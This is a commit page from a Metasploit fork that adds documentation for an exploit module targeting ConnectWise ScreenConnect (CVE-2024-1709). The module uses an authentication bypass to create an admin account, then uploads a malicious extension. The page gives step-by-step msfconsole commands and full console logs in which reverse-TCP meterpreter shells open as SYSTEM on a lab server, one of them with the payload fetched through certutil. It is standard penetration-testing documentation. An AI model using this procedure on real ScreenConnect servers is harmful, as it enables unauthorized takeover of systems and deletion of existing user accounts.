dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

add in docs

This commit is contained in:
sfewer-r7 2024-02-21 17:44:16 +00:00
parent e0ee7940d0
commit f6b1c9b1ce
No known key found for this signature in database
1 changed files with 176 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

176
documentation/modules/exploit/windows/http/connectwise_screenconnect_rce_cve_2024_1709.md Normal file
View File

@ -0,0 +1,176 @@
## Vulnerable Application
This module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create
a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage
this to achieve RCE by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7
and below are affected.
**Note:** The vulnerability will replace the ScreenConnect systems existing User.xml file, meaning existing user
accounts will be removed after exploitation.
## Testing
* Download a vulnerable version of the software by visiting:
* https://screenconnect.connectwise.com/download/archive, for example download the file
[ScreenConnect_23.9.7.8804_Release.msi](https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_23.9.7.8804_Release.msi)
* Request a trial license if you do not already have one.
* On a Windows system, click through the installer to install the product and complete the installation in your
web browser as instructed.
* Once completed, you can login by visiting http://127.0.0.1:8040/ in your browser.
## Verification Steps
1. Start msfconsole
2. `set target 0`
3. `set payload windows/x64/meterpreter/reverse_tcp`
4. `set LHOST eth0`
5. `set RHOST <TARGET_IP_ADDRESS>`
6. `check`
7. `exploit`
## Scenarios
### Windows In-Memory
```
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set target 0
target => 0
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set RHOST 192.168.86.50
RHOST => 192.168.86.50
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > show options
Module options (exploit/windows/http/connectwise_screenconnect_rce_cve_2024_1709):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.50 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8040 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST eth0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows In-Memory
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > check
[*] 192.168.86.50:8040 - The target appears to be vulnerable. ConnectWise ScreenConnect 23.9.7.
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. ConnectWise ScreenConnect 23.9.7.
[*] Created account: jpusoojm:ukvEw9bnQFwXkhqX. Note: This account will not be deleted by the module.
[*] Uploaded Extension: 93adc1a3-213c-c88a-56bc-dcf1351a4cad
[*] Removing Extension: 93adc1a3-213c-c88a-56bc-dcf1351a4cad
[*] Sending stage (201798 bytes) to 192.168.86.50
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:53443) at 2024-02-21 17:35:38 +0000
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-V28QNSO2H05
OS : Windows Server 2022 (10.0 Build 20348).
Architecture : x64
System Language : en_US
Meterpreter : x64/windows
meterpreter > pwd
C:\Windows\system32
meterpreter > exit
[*] Shutting down session: 1
[*] 192.168.86.50 - Meterpreter session 1 closed. Reason: User exit
```
#### Windows Command
```
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set target 1
target => 1
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set payload cmd/windows/
Display all 619 possibilities? (y or n)
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > show options
Module options (exploit/windows/http/connectwise_screenconnect_rce_cve_2024_1709):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.50 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8040 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME pSPyWvtiaaH no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces.
LHOST eth0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows Command
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > check
[*] 192.168.86.50:8040 - The target appears to be vulnerable. ConnectWise ScreenConnect 23.9.7.
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. ConnectWise ScreenConnect 23.9.7.
[*] Created account: xkerretc:Ctp1yP9Gh4htnE2s. Note: This account will not be deleted by the module.
[*] Uploaded Extension: b7eb38d2-ea46-f662-2c3e-d6e3071767f7
[*] Removing Extension: b7eb38d2-ea46-f662-2c3e-d6e3071767f7
[*] Sending stage (201798 bytes) to 192.168.86.50
[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:53686) at 2024-02-21 17:37:46 +0000
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-V28QNSO2H05
OS : Windows Server 2022 (10.0 Build 20348).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > pwd
C:\Windows\system32
meterpreter >
```